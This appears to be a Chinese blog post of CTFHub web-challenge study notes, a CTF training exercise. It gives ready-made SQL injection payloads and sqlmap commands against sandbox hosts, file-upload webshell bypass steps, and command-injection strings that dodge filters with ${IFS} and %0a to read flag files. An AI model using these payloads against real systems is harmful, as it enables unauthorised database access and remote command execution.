Web

HTTP协议

请求方式

 

302跳转

 

cookie

 

基础认证

 

响应包源代码

 

信息泄露

目录遍历

 

phpinfo

 

备份文件下载

网站源码

 

bak文件

 

vim缓存

下载下来放到linux中
在文件前面加的点(.)   .index.php.swp
然后运行 vi -r index.php
 

.DS_Store

记事本打开
 

Git泄露

Log

 

Stash

同上
 

Index

同上
 

SVN泄露

使用dvcs-ripper工具
 

HG泄露

使用dvcs-ripper工具
 
 

密码口令

弱口令

admin 123456
 

默认口令

百度搜索亿邮邮件网关默认口令
 
 
 

SQL注入

整数型注入

 

字符型注入

 

报错注入

extractvalue函数报错:       1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) );
updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
只能显示32位:
substr(字符串,开始位置,长度)
 

布尔盲注

sqlmap
 
数据库 sqli   表 flag   字段 flag
 

时间盲注

sqlmap
 
MySQL结构
-1 union select 1, group_concat(djbtjjrnuq) from sqli.pqfzaflkkt;
 
cookie注入
sqlmap -u " http://challenge-52d3494f9e4a406f.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs 
 
UA注入
user-agent:   -1 union select 1,group_concat(hddxcgzzsv) from sqli.bgerzmdwpi;#
sqlmap: 
sqlmap -u "http://challenge-f7a6b5d5665981cc.sandbox.ctfhub.com:10080/" --user-agent "123" --level 3 --dbs -technique U --dbms
 
Refer注入
同上,只不过在referer中输入SQL语句
 

XSS

反射型

 

文件上传

无验证

前端验证

把PHP文件后缀改为jpg,抓包再改回php

.htaccess

上传.htaccess和hhh.jpg
 
MIME绕过
正常上传,抓包,将content-type改为 image/jpeg

00截断

双写后缀

文件头检测

将一句话马改为jpg后缀,抓包,修改后缀为php,并添加gif头
 

RCE

命令注入

127.0.0.1 & ls
 
过滤cat
127.0.0.1 & more flag_162822816029866.php
 

过滤空格

使用${IFS}代替空格(可以代替空格的有IFS$9、%09、%0a、<、>、<>、{,}、${IFS}等)
 
过滤目录分隔符
使用;符号分割命令
127.0.0.1 & ls
发现flag_is_here目录
127.0.0.1 & cd flag_is_here;ls
发现flag_44052408916433.php文件
127.0.0.1& cd flag_is_here;ls;cat flag_44052408916433.php
查看源代码得到flag
 

过滤运算符

127.0.0.1 ; cat flag_991932693945.php
 

综合过滤练习

过滤了|,&,;, ,/,cat,flag,ctfhub
%0a(换行符)可以代替;符号,但是要在url处输入,不然会被再次转义
%09或者${IFS}等,可以替代空格
通配符 *   ?
 
127.0.0.1%09%0a%09cd%09fla?_is_here%0amore%09fla?_260832613315632.php#
 
 
 

【CTFHUB】Web技能树的更多相关文章

  1. CTFHub web技能树之RCE初步 命令注入+过滤cat

    在一个大佬的突然丢了个题过来,于是去玩了玩rce的两道题 大佬的博客跳转链接在此->>>大佬召唤机 叫 命令注入 一上来就是源码出现,上面有个ping的地方 <?php $re ...

  2. CTFHub web技能树 RCE

    一个简单的ping,还没有过滤,源码也给出来了 ls一下 127.0.0.1 & ls 有一个可疑的php文件,,,但是直接访问和 cat 都出不来... 试了几下反弹shell,没成功... ...

  3. CTFHub Web题学习笔记(Web前置技能+信息泄露题解writeup)

    今天CTFHub正式上线了,https://www.ctfhub.com/#/index,之前有看到这个平台,不过没在上面做题,技能树还是很新颖的,不足的是有的方向的题目还没有题目,CTF比赛时间显示 ...

  4. CTFHub Web题学习笔记(SQL注入题解writeup)

    Web题下的SQL注入 1,整数型注入 使用burpsuite,?id=1%20and%201=1 id=1的数据依旧出现,证明存在整数型注入 常规做法,查看字段数,回显位置 ?id=1%20orde ...

  5. CTFHub[PWN技能树]——栈溢出

    文章目录 一.ret2text 二.ret2shellcode 一.ret2text 例行检查,64位程序,没有开启任何保护 本地运行一下情况,看看大概的情况 64位ida载入,检索程序里的字符串发现 ...

  6. CTFHub - Web(六)

    命令注入: 1.进入页面,测试127.0.0.1, 关键代码: <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip'] ...

  7. CTFHub - Web(五)

    eval执行: 1.进入网页,显示源码, <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } els ...

  8. CTFHub - Web(四)

    最近又是每天忙到裂开,,,淦 xss: 反射型: 1.第一个输入框与下面Hello后的内容相同,猜测可以通过该输入,改变页面内容. 测试语句: <script>alert(1)</s ...

  9. CTFHub - Web(三)

    密码口令: 弱口令: 1.随意输入账号密码,抓包, 2.右击,"Send to Intruder",打开选项卡Intruder,点击position,椭圆框处软件已经自动为我们把要 ...

随机推荐

  1. http协议跟tcp协议的简单理解

    在说明这两个协议之前,我们先简单说一下网络的分层. 1)应用层 支持网络应用,应用协议仅仅是网络应用的一个组成部分,运行在不同主机上的进程则使用应用层协议进行通信.主要的协议有:http.ftp.te ...

  2. Coursera课程笔记----计算导论与C语言基础----Week 5

    从现实问题到计算机程序(Week 5) 总结回顾 计算机只能按照程序去执行,不可能自己"想出"一个解决问题的方法 面对一个问题,你必须自己找到解决方案,才有可能做出相应的程序 所以 ...

  3. PHP导出excel文件,第二步先实现自写二维数组加入模板excel文件后导出

    今天主要研究数据加入EXCEL并导出的问题,先不从数据库提取数据导出,自己先写一个二维数组,然后遍历二维数组写入excel模板中导出,首先根据模板excel的内容书写对应的二维数组 $arr=arra ...

  4. 设计模式之GOF23中介者模式

    中介者模式Mediator 场景:公司中各个部门需要交互,通过中介总经理进行交互 核心: 如果一个系统中对象之间的联系成网状结构,对象之间多对多,将导致关系极其复杂,这些对象统称为“同事关系” 我们可 ...

  5. [hdu5593 ZYB's Tree] 树上统计

    题意:给1棵N(≤500,000)个节点的树,每条边边权为1,求距离每个点距离不超过K(K≤10)的点的个数的xor和. 思路:由于K很小,可以考虑把距离作为状态的一部分,然后研究父子之间状态的联系. ...

  6. [hdu5218]DP-约瑟夫环变形

    题意:n个人围成一圈,另外一个人最开始站在第一个人前面,每次从集合s里面随机选一个数x,这个人顺时针经过x个人后停下来,当前位置的前一个人出队,然后继续进行,求最后剩下的那个人的可能编号. 思路:由于 ...

  7. python读取excel所有数据(cmd界面)

    python读取excel所有数据(cmd界面) cmd界面显示excel数据 代码 import xlrd import os from prettytable import PrettyTable ...

  8. JQ选择器-选择符合条件的元素,获取对应关系元素

    如果你想寻找id以“sub_”开头的元素,你可以使用: $("*[id^='sub_']") 如果你想寻找id以“trim”结尾的元素,你可以使用: $("*[id$=' ...

  9. docker部署微服务遇到的问题二

    自己尝试将微服务部署到docker上面,期间按照周立的微服务架构实战13章进行学习 按照书上的步骤,一切部署成功之后,尝试访问,一直没有成功访问,周五部署了两遍 折腾了一下 还是没有找到为啥,周一继续 ...

  10. 消息队列之Kafka——从架构技术重新理解Kafka

    Apache Kafka® 是 一个分布式流处理平台. 这到底意味着什么呢? 我们知道流处理平台有以下三种特性: 可以让你发布和订阅流式的记录.这一方面与消息队列或者企业消息系统类似. 可以储存流式的 ...